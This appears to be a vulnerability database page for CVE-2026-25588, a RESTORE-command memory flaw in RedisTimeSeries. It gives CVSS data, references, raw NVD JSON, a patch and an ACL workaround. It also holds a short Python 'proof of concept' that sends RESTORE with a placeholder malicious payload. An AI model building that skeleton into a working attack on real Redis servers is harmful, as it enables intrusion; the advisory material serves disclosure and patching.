CVE-2026-25588

Description

RedisTimeSeries is a time-series module for Redis. In all versions before 1.12.14 of RedisTimeSeries, the module does not properly validate serialized values processed through the Redis RESTORE command. An authenticated attacker with permission to execute RESTORE on a server with the RedisTimeSeries module loaded can supply a crafted serialized payload that triggers invalid memory access and may lead to remote code execution. A workaround is to restrict access to the RESTORE command with ACL rules. This has been patched in version 1.12.14.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:redistimeseries:redistimeseries:*:*:*:*:*:*:*:* - VULNERABLE

RedisTimeSeries < 1.12.14

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import redis

# Target configuration
TARGET_HOST = '127.0.0.1'
TARGET_PORT = 6379
REDIS_PASSWORD = 'your_password'

# Connect to Redis
client = redis.Redis(host=TARGET_HOST, port=TARGET_PORT, password=REDIS_PASSWORD)

# Crafted malicious serialized payload
# This is a conceptual payload. A real exploit would contain specific
# bytes designed to corrupt memory in RedisTimeSeries.
malicious_payload = b"\x0a\x00\x00\x00..."

try:
    # Send RESTORE command to trigger the vulnerability
    # The '0' indicates no TTL, 'REPLACE' overwrites existing key
    response = client.execute_command('RESTORE', 'vuln_key', '0', malicious_payload, 'REPLACE')
    print("Exploit sent, check server status.")
except redis.ResponseError as e:
    print(f"Redis error: {e}")
except Exception as e:
    print(f"Connection error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-25588
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-25588
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-25588/
[4] VulDB https://vuldb.com/cve/CVE-2026-25588
[5] https://github.com/RedisTimeSeries/RedisTimeSeries/releases/tag/v1.12.14
[6] https://github.com/RedisTimeSeries/RedisTimeSeries/security/advisories/GHSA-7jwr-g5qv-w3gw

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-25588", "sourceIdentifier": "[email protected]", "published": "2026-05-05T17:17:03.800", "lastModified": "2026-05-07T13:46:38.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RedisTimeSeries is a time-series module for Redis. In all versions before 1.12.14 of RedisTimeSeries, the module does not properly validate serialized values processed through the Redis RESTORE command. An authenticated attacker with permission to execute RESTORE on a server with the RedisTimeSeries module loaded can supply a crafted serialized payload that triggers invalid memory access and may lead to remote code execution. A workaround is to restrict access to the RESTORE command with ACL rules. This has been patched in version 1.12.14."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redistimeseries:redistimeseries:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.12.14", "matchCriteriaId": "6F340A97-7BFF-46C0-9676-F1E76164088E"}]}]}], "references": [{"url": "https://github.com/RedisTimeSeries/RedisTimeSeries/releases/tag/v1.12.14", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://github.com/RedisTimeSeries/RedisTimeSeries/security/advisories/GHSA-7jwr-g5qv-w3gw", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}